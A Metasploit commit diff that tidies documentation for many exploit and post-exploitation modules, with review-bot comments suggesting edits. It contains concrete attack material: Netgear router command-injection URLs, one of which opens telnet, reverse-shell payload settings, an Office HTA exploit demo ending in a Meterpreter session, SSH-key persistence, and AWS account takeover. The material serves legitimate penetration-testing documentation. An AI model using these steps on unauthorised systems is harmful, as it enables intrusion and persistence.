Land #9493 updates to various docs

4.x
h00die 2018-02-04 13:54:17 -05:00 committed by Jeffrey Martin
parent 64c0d60fbf
commit 5457cec81c
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
26 changed files with 90 additions and 65 deletions

View File

@ -1,4 +1,6 @@
MS17-010 are psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
## Introduction
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
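Review bot: the new closing sentence "so you might have to evade your payloads" is unclear; it is antivirus that needs evading, not the payload. Suggest "so you may need to encode or obfuscate your payload to evade antivirus", which also makes the contrast with EternalBlue's kernel-shellcode staging explicit.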

View File

@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
## Verification Steps
1. Do: `use auxiliary/gather/censys_search`
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
4. Do: `set CENSYS_SEARCHTYPE certificates`
5: Do: `set CENSYS_DORK rapid7`
5: Do: `set CENSYS_DORK query`
6: Do: `run`
## Scenarios
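Review bot: steps 5 and 6 still use "5:" and "6:" as list markers while steps 1 to 4 use "1." style, so Markdown will not render them as part of the numbered list; change them to "5. Do: `set CENSYS_DORK query`" and "6. Do: `run`". The nested parenthetical "(length: 32 (without dashes))" on the CENSYS_UID step reads awkwardly; "(32 characters, excluding dashes)" says the same thing.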

View File

@ -1,8 +1,9 @@
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not.
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
## Introduction
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
#### NOTE:
In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
#### NOTE:
In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
## Verification Steps
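Review bot: "#### NOTE:" jumps two heading levels below the surrounding "##" headings; either use "### Note" or a bold "**Note:**" paragraph. The fragment "0.0 being `not a honeypot` and 1.0 being a `honeypot`." should be attached to the preceding sentence with a comma rather than standing alone.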
@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
3. Do: `set TARGET <targetip>`
4. Do: `set SHODAN_APIKEY <your apikey>`
5. Do: `run`
6. If the API is up, you should recieve a score from 0.0 to 1.0.
6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
## Options
**TARGET**
The remote host to request the API to scan.
**SHODAN_APIKEY**
This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
## Scenarios
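Review bot: in step 6 the added parenthetical "(1.0 being a honeypot)" sits after the full stop; move it inside the sentence: "you should receive a score from 0.0 to 1.0 (1.0 being a honeypot)."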

View File

@ -7,8 +7,8 @@
1. start `msfconsole`
2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
3. `set RHOST 192.168.1.1` `<--- Router IP`
4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
5. `set PAYLOAD cmd/unix/reverse_bash`
6. `set LHOST 192.168.1.x`
7. `set LPORT xxxx`
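Review bot: step 2 in the unchanged context, `use exploit/linux/http/netger_dnslookup_cmd_exec`, misspells the module path (the corrected links in steps 4 and 5 point at netgear_dnslookup_cmd_exec.md), so anyone copying the step verbatim gets an unknown-module error; since this file is being edited, correct it to `netgear_dnslookup_cmd_exec`. The list also has two steps numbered 5 (PASSWORD and PAYLOAD); renumber PAYLOAD, LHOST and LPORT as 6, 7 and 8.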

View File

@ -1,4 +1,5 @@
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
## Introduction
The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
## Vulnerable Application
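Review bot: the last sentence of the Introduction runs two clauses together ("A fairly useful manual command injection is like so: ... will open telnet on port 45"); make the URL the subject of one sentence, e.g. "A more useful manual injection is `<URL>`, which starts telnetd on port 45." Also "would look like so:" and "is like so:" in consecutive sentences is repetitive.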

View File

@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
## Options
**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
**CUSTOMTEMPLATE**
A docx file that will be used as a template to build the exploit.
## Trusted Document

View File

@ -1,10 +1,12 @@
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
## Introduction
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
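Review bot: the "Vulnerable OS:" enumeration is written as separate prose lines ending in commas (Orange Pis, NanoPi M1, M2+ and M3, Cubietruck +, pcDuino8 Uno), which Markdown collapses into a single run-on paragraph; turn it into a bullet list under a "Vulnerable OS:" line, and give "Vulnerable Allwinner SoC chips:" the same treatment. In the last paragraph, "Implements the Allwinner privilege escalation ..." has no subject; start it with "It implements".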

View File

@ -1,3 +1,5 @@
## Introduction
The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
The web_delivery module supports three different languages for delivery: Python, PHP, and
@ -5,6 +7,7 @@ Powershell. You should manually select the correct target based on the victim en
For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
## Verification Steps
To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:
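Review bot: "Powershell" appears in both hunks of this file where the product name is "PowerShell"; fix the capitalisation while the file is being touched.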

View File

@ -7,8 +7,7 @@ A fix was released in the June 2017 Patch Tuesday.
## Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
## Verification Steps
### Start a handler
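Review bot: removing "To test the bypass, ensure that MS10-046 & MS15-020 are installed." drops the only statement about which earlier patches must be present on the test machine; if the sentence is being removed because it was inaccurate, the commit should say what the correct prerequisite is, otherwise it should stay.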
@ -16,7 +15,6 @@ To set up the vulnerable environment, install a Windows version without the patc
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
3. `set LHOST [ip victim connects back to]`
4. `exploit -j`
5. `back`
### Run the exploit

View File

@ -1,4 +1,3 @@
Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
## Vulnerable Application

View File

@ -1,7 +1,8 @@
## Introduction
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
## Vulnerable Application
## Vulnerable Applications
- Microsoft Office 2016
- Microsoft Office 2013 Service Pack 1
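Review bot: the unchanged context sentence directly above the renamed heading is ungrammatical ("a flaw in how the Equation Editor that allows", "to which fails to properly handle"); since the hunk already edits this region, rewrite it as "This module exploits a flaw in the Equation Editor that allows an attacker to execute arbitrary code via RTF files without user interaction. The vulnerability is caused by the Equation Editor failing to properly handle OLE objects in memory."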
@ -15,6 +16,7 @@ Module exploits a flaw in how the Equation Editor that allows an attacker to exe
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`
## Options
### FILENAME
Filename to output & if injecting a file, the file to inject

View File

@ -1,11 +1,13 @@
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
## Introduction
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Visual Basic for Application scripting language.
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
## Vulnerable Application
## Vulnerable Applications
- Windows Vista Service Pack 2
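Review bot: "Visual Basic for Application scripting language" should be "Visual Basic for Applications (VBA) scripting language", and "issues a HTTP request" in the next paragraph should be "an HTTP request".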
@ -41,8 +43,7 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
## Demo
```
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
@ -52,7 +53,7 @@ srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
@ -65,4 +66,3 @@ and open it with Microsoft Office Word. You should receive a session:
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```

View File

@ -20,7 +20,7 @@
## Scenarios
###VX Search Enterprise v9.5.12 on Windows 7 SP1
### VX Search Enterprise v9.5.12 on Windows 7 SP1
```
msf exploit(vxsrchs_bof) > show options

View File

@ -21,7 +21,7 @@
and manually create a job handler corresponding to the payload.
##Scenario
## Scenario
```
msf >

View File

@ -1,10 +1,10 @@
## Intro
This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
This module exploits a null pointer dereference vulnerability present in the `mrxdav.sys` kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
## Usage
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. From here, running the module will result in the payload being executed with system level privileges.
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the `payload` and `session` options. From here, running the module will result in the payload being executed with system level privileges.
An example session follows:
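Review bot: the description sentence still ends without a full stop after "(NT AUTHORITY\SYSTEM)"; add one. "meterpreter" as the payload name is written "Meterpreter" in the other docs in this commit.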

View File

@ -14,11 +14,11 @@
Example steps in this format:
1. Install the application
2. Wait for `C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads` folder to appear
2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
3. Start msfconsole
4. Get a shell
5. Do: `use exploit/windows/local/panda_psevents`
6. Do: `set session #`
6. Do: `set session [ID]`
7. Do: `exploit`
8. Go do something else while you wait
9. Enjoy being system with your shell
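Review bot: "Example steps in this format:" above step 1 is leftover text from the module documentation template and should be deleted. Step 6 now uses `set session [ID]`, whereas the archmigrate doc in this same commit uses `set session #`; pick one placeholder convention for both.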
@ -151,4 +151,4 @@ Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name:
Faulting package-relative application ID:
```
```

View File

@ -11,7 +11,7 @@ context of SYSTEM.
HP Data Protector versions 7, 8, and 9 are known to be affected.
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
This module was tested against version 9.0.0 on Windows 2008.
## Verification Steps

View File

@ -1,8 +1,8 @@
ms17_010_eternalblue is a remote exploit against Microsoft Windows, originally written by the
Equation Group (NSA) and leaked by Shadow Brokers (an unknown hacking entity). It is
considered a reliable exploit and allows you to gain access not only as SYSTEM - the highest Windows
user mode privilege, but also full control of the kernel in ring 0. In modern day penetration tests,
this exploit can be found in internal and external environments.
user mode privilege, but also full control of the kernel in [ring 0](https://en.wikipedia.org/wiki/Protection_ring). In modern day penetration tests,
this exploit can be used in internal and external environments.
As far as remote kernel exploits go, this one is highly reliable and safe to use.
@ -14,13 +14,10 @@ inadvertently added an information disclosure with extra checks on vulnerable co
This exploit works against a vulnerable SMB service from one of these Windows systems:
[//]: # (https://stackoverflow.com/questions/4823468/comments-in-markdown)
[//]: # (* Windows XP x86 (All Service Packs))
[//]: # (* Windows 2003 x86 (All Service Packs))
[//]: # (* Windows 7 x86 (All Service Packs))
* Windows XP x86 (All Service Packs))
* Windows 2003 x86 (All Service Packs))
* Windows 7 x86 (All Service Packs))
* Windows 7 x64 (All Service Packs)
* Windows 2008 R2 x64 (All Service Packs)
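Review bot: the three entries moved out of the Markdown comments keep a stray second closing parenthesis from the comment wrapper ("* Windows XP x86 (All Service Packs))"), unlike the Windows 7 x64 and 2008 R2 lines; drop the trailing ")". With the entries live again, the `[//]: # (https://stackoverflow.com/...)` explainer line and the three commented-out copies serve no purpose and can go.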

View File

@ -1,4 +1,5 @@
Gathers several pieces of information from the vehicle. First it reports
## Introduction
This module gathers several pieces of information from the vehicle. First it reports
the available PIDS for pulling realtime current_data from Mode $01. If some of
the common PIDs are returned it will print those as well, such as Engine Temp and
Vehicle speed. If there are any Diagnostic Trouble Codes (DTCs) it will list those.
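Review bot: "PIDS" on the first line should be "PIDs" as on the following lines of this file, and "Engine Temp" / "Vehicle speed" should use consistent capitalisation.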
@ -22,7 +23,7 @@ PIDs to ASCII.
Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.
**CLEAR_DTCS***
**CLEAR_DTCS**
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Engine Light).

View File

@ -1,3 +1,5 @@
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
### Creating A Testing Environment
This module has been tested against:
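Review bot: "### Creating A Testing Environment" is a level-3 heading while the file's other sections (for example "## Options" in the next hunk) are level 2; use "##" so the sections are siblings, and "A" in the title should be lowercase.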
@ -22,15 +24,15 @@
## Options
**sshd_config**
**SSHD_CONFIG**
Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys
**username**
**USERNAME**
If set, we only write our key to this user. If not, we'll write to all users
**PubKey**
**PUBKEY**
A public key to use. If not provided, a pub/priv key pair is generated automatically
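Review bot: the PUBKEY description says a key pair is generated automatically when none is supplied, but not where the generated private key is written or how the operator retrieves it; add that to the option text, since the reader needs it to use the added key. "pub/priv key pair" should be spelled out as "public/private key pair".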

View File

@ -1,6 +1,6 @@
# aws_create_iam_user
# Introduction
aws_create_iam_user is a simple post module that can be used to take over AWS
`aws_create_iam_user` is a simple post module that can be used to take over AWS
accounts. Sure, it is fun enough to take over a single host, but you can own all
hosts in the account if you simply create an admin user.
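Review bot: "# Introduction" is a level-1 heading, while every other documentation file in this commit uses "## Introduction"; use "##" here as well.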

View File

@ -1,3 +1,5 @@
## Introduction
This is a post exploitation module which has the effect of copying the AD groups, user membership
(taking into account nested groups), user information and computers to a local SQLite database.
This is particularly useful for red teaming and simulated attack engagements because it offers

View File

@ -5,7 +5,6 @@ Having this feature as a post module allows it to be used in different penetrati
## Vulnerable Application
---
To be able to use post/gather/hash_dump, you must meet these requirements:
@ -15,13 +14,10 @@ To be able to use post/gather/hash_dump, you must meet these requirements:
## Verification Steps
---
Please see Overview for usage.
## Scenarios
---
**Upgrading to Meterpreter**

View File

@ -1,3 +1,5 @@
## Introduction
This module can be used to aid the generation of an organizational chart based on information
contained in Active Directory. The module itself uses ADSI to retrieve key information from AD
(manager, title, description etc) fields and then present it in a CSV file in the form:

View File

@ -12,13 +12,28 @@ This module was not tested against, but may work against:
1. Other versions of Windows that are x64.
## Verification Steps
## Options
**EXE**
The executable to start and migrate into. Default: `C:\windows\sysnative\svchost.exe`
**FALLBACK**
If the selected migration executable does not exist, fallback to a sysnative file. Default: `true`
**IGNORE_SYSTEM**
Migrate even if you have SYSTEM privileges. Default: `true`
### Verification Steps
1. Start msfconsole
2. Obatin a meterpreter session with an executable meterpreter via whatever method
3. Do: 'use post/windows/manage/archmigrate'
4. Do: 'set session #'
5. Do: 'run'
2. Obtain a meterpreter session with an executable meterpreter via whatever method
3. Do: `use post/windows/manage/archmigrate`
4. Do: `set session #`
5. Do: `run`
## Scenarios
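Review bot: the new "### Verification Steps" is a level-3 heading nested under "## Options", one level below the "## Scenarios" that follows it; make it "## Verification Steps" and place it before "## Options" to match the section order (Verification Steps, then Options, then Scenarios) the other docs in this commit use. Step 4 `set session #` should also match the `set session [ID]` placeholder adopted in the panda_psevents doc.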

View File

@ -25,7 +25,7 @@ The process will use the Start-Process command of powershell to run a process as
## Examples
`
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword
@ -46,5 +46,5 @@ meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword hidde
[*] Process 9768 created.
meterpreter >
```
`